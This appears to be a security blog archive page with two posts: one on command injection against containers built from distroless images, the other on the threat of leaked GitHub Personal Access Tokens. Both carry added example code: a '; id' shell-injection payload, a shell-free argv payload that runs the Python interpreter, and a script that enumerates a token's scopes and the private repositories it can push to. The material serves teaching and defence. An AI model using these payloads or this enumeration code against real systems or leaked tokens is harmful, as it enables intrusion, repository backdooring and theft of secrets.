
Posts

Showing posts from August, 2021

Attacking with Command Injection on Containers created using Google's Distroless Images

As the project's GitHub README puts it, "'Distroless' images contain only your application and its runtime dependencies. They do not contain package managers, shells or any other programs you would expect to find in a standard Linux distribution." (https://github.com/GoogleContainerTools/distroless)

There are several reasons why distroless images are getting popular:
- minimal size
- no excess binaries: the non-debug images ship no shell at all, not even /bin/sh (the :debug variants add a busybox shell)
- a smaller attack surface, because there is less in the image for an attacker to use

A misconception found in a few blog posts is that command injection attacks are impossible in containers built from distroless images. It is true that the usual command injection payloads fail, because they rely on a shell to interpret them, but it is wrong to say that injection is impossible. This post is about attacking such containers.

Here is my base code and the Dockerfile.

app.py
from flask import Flask, request
import os
import subprocess
app = Flask(__name__)
@app.route("/
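The excerpt above stops before the post's own payload, so the following is an added illustration, not the post's code, of the underlying mechanism: injection into a command string only works when a shell is there to parse it, while control over the argument list of a shell-less `subprocess` call still executes whatever binaries the image does ship (a Python image necessarily ships the interpreter). The `echo`/`ping`-style command, the `/nonexistent/sh` path used to simulate a distroless container, and the payloads are all constructed for this example.

```python
"""Added example (not the post's code): why shell-string command injection
stops working on a distroless image, and why execve-style injection does not.
The command string, the simulated missing shell and the payloads are
constructed for illustration."""
import os
import subprocess
import sys
from typing import List, Optional


def image_has_shell() -> bool:
    """Distroless (non-:debug) images ship neither /bin/sh nor /bin/bash."""
    return any(os.path.exists(p) for p in ("/bin/sh", "/bin/bash", "/usr/bin/sh"))


def run_via_shell(user_input: str, shell: Optional[str] = None) -> int:
    """The classic injectable pattern: untrusted text concatenated into a
    command string and handed to a shell (shell=True, like os.system).
    Returns the exit status, or 127 when the shell itself cannot be started,
    which is the situation inside a distroless container.  `shell` lets the
    caller point at a non-existent shell to reproduce that case anywhere."""
    cmd = "echo hello " + user_input          # vulnerable on purpose
    try:
        cp = subprocess.run(cmd, shell=True, executable=shell,
                            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        return cp.returncode
    except FileNotFoundError:                 # no shell binary at all
        return 127


def run_argv(argv: List[str]) -> int:
    """What an app does when it calls subprocess with a list: no shell is
    involved, the first element is exec'd directly.  If the attacker controls
    that list (or just its first element), they can run any binary that IS in
    the image, for example the Python interpreter a python3 image must ship."""
    try:
        return subprocess.run(argv, stdout=subprocess.DEVNULL,
                              stderr=subprocess.DEVNULL).returncode
    except FileNotFoundError:
        return 127


# Attacker-controlled value that chains a command via the shell (`; id`)
# and is therefore useless without one:
SHELL_PAYLOAD = "; id"
# Attacker-controlled argv that needs no shell; exit code 42 proves execution.
NO_SHELL_PAYLOAD = [sys.executable, "-c", "import sys; sys.exit(42)"]

if __name__ == "__main__":
    print("shell present on this host:", image_has_shell())
    print("shell injection with the shell missing ->",
          run_via_shell(SHELL_PAYLOAD, "/nonexistent/sh"))
    print("argv injection, no shell needed ->", run_argv(NO_SHELL_PAYLOAD))
```

Run it on any host: the first call returns 127 because the simulated shell path does not exist, exactly as `os.system` or `shell=True` would fail inside a distroless container, while the second returns 42 because `execve` of the interpreter needs no shell. The practical consequence is that on distroless you look for code paths where you control an argument vector or an interpreter invocation, not for places to smuggle `;` or `$(...)`.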

Threats of leaked Github Personal Access Tokens : Private Github Enumeration, Backdooring Apps and Stealing Secrets from CICD systems

We have seen scenarios and real-world impacts of secrets and API keys committed to public version control systems such as GitHub and GitLab. They have contributed to serious breaches, leaked personal information and so on. The risk of any leaked token is serious, but it is even worse in case the token is a GitHub Personal Access Token. In this post I demonstrate the impact of a leaked GitHub Personal Access Token.  As leaked GitHub Personal Access Tokens are on the rise in public repositories, this post is meant to educate about the threats and risks they pose once exposed.  Personal access tokens are an alternative to using passwords for authentication on the command line or against the GitHub API. They are commonly found in configuration files where a developer needs to clone private repositories. Private repositories are not visible to users who lack the authorization to view them. Take for example the URL https://github.com/hellctflife/myapp . Requested without authorization it returns a 404, the same response GitHub gives for a repository that does not exist, so an outsider cannot even confirm that it is there.
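To make the "404 for outsiders, full access for the token holder" point concrete, here is an added example, not the post's own code, that does what an attacker with a leaked classic PAT would do first: confirm whose token it is and which scopes it carries (GitHub reports a classic token's scopes in the `X-OAuth-Scopes` response header of any authenticated call), list every private repository the token can see together with whether it grants push access, and show the 404-versus-200 difference on a specific repository. Only the real REST endpoints `GET /user`, `GET /user/repos` and `GET /repos/{owner}/{repo}` are used; the token value, the `hellctflife/myapp` data and the `fake_get` stand-in for the API are constructed so the example runs offline.

```python
"""Added example (not the post's code): what a leaked classic GitHub Personal
Access Token lets its holder learn.  The token value, the repository data and
the offline stand-in for the API are constructed for illustration."""
import json
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

API = "https://api.github.com"
Response = Tuple[int, Dict[str, str], bytes]      # (status, headers, body)
Getter = Callable[[str, str], Response]


def github_get(token: str, path: str) -> Response:
    """One GET against the API.  Returns (status, lower-cased headers, body)
    instead of raising, so a 401 or 404 can be inspected like a 200."""
    headers = {"Accept": "application/vnd.github+json",
               "User-Agent": "pat-impact-example"}
    if token:
        headers["Authorization"] = "token " + token
    req = urllib.request.Request(API + path, headers=headers)
    try:
        with urllib.request.urlopen(req) as resp:
            return resp.status, {k.lower(): v for k, v in resp.headers.items()}, resp.read()
    except urllib.error.HTTPError as e:
        return e.code, {k.lower(): v for k, v in e.headers.items()}, e.read()


def token_identity(token: str, get: Getter = github_get) -> Tuple[str, List[str]]:
    """Who the token belongs to and which scopes it carries."""
    status, headers, body = get(token, "/user")
    if status != 200:
        raise PermissionError(f"token rejected: HTTP {status}")
    scopes = [s.strip() for s in headers.get("x-oauth-scopes", "").split(",") if s.strip()]
    return json.loads(body)["login"], scopes


def private_repos(token: str, get: Getter = github_get) -> List[Dict[str, object]]:
    """Every private repository the token can see, with the access it grants
    (push means the holder can commit, i.e. backdoor the code)."""
    found, page = [], 1
    while True:
        status, _, body = get(token, f"/user/repos?visibility=private&per_page=100&page={page}")
        if status != 200:
            raise PermissionError(f"repo listing failed: HTTP {status}")
        batch = json.loads(body)
        if not batch:                          # last page reached
            return found
        for repo in batch:
            found.append({"full_name": repo["full_name"],
                          "push": bool(repo["permissions"]["push"]),
                          "clone_url": repo["clone_url"]})
        page += 1


def repo_visible(token: str, full_name: str) -> bool:
    """The 404-vs-200 check: without a token that grants access, a private
    repository is indistinguishable from one that does not exist."""
    status, _, _ = get_impl(token, "/repos/" + full_name)
    return status == 200


# Constructed, offline stand-in for the API so the example runs without
# network access: one valid token, one private repository.
FAKE_TOKEN = "ghp_EXAMPLEtokenNOTreal"
_FAKE_REPO = {"full_name": "hellctflife/myapp", "private": True,
              "permissions": {"admin": False, "push": True, "pull": True},
              "clone_url": "https://github.com/hellctflife/myapp.git"}


def fake_get(token: str, path: str) -> Response:
    authed = token == FAKE_TOKEN
    if path == "/repos/" + _FAKE_REPO["full_name"]:
        # private repo: 404 to anyone not authorised, exactly like github.com
        return (200, {}, json.dumps(_FAKE_REPO).encode()) if authed \
            else (404, {}, b'{"message":"Not Found"}')
    if not authed:
        return 401, {}, b'{"message":"Bad credentials"}'
    if path == "/user":
        return 200, {"x-oauth-scopes": "repo, workflow"}, b'{"login":"hellctflife"}'
    if path.startswith("/user/repos"):
        return (200, {}, json.dumps([_FAKE_REPO]).encode()) if path.endswith("page=1") \
            else (200, {}, b"[]")
    return 404, {}, b'{"message":"Not Found"}'


get_impl: Getter = fake_get      # switch to github_get to run against the real API

if __name__ == "__main__":
    login, scopes = token_identity(FAKE_TOKEN, get_impl)
    print(f"token belongs to {login}, scopes: {scopes}")
    for r in private_repos(FAKE_TOKEN, get_impl):
        print(f"{r['full_name']}  push={r['push']}  {r['clone_url']}")
    print("anonymous sees repo:", repo_visible("", "hellctflife/myapp"))
    print("token holder sees repo:", repo_visible(FAKE_TOKEN, "hellctflife/myapp"))
```

With `get_impl = github_get` and a real token the same calls hit api.github.com; a `repo`-scoped classic PAT returning `push=True` on a repository is the precondition for the backdooring and CI secret theft the title refers to, which is why the first thing to do with a token found in a public repository is to check its scopes and revoke it.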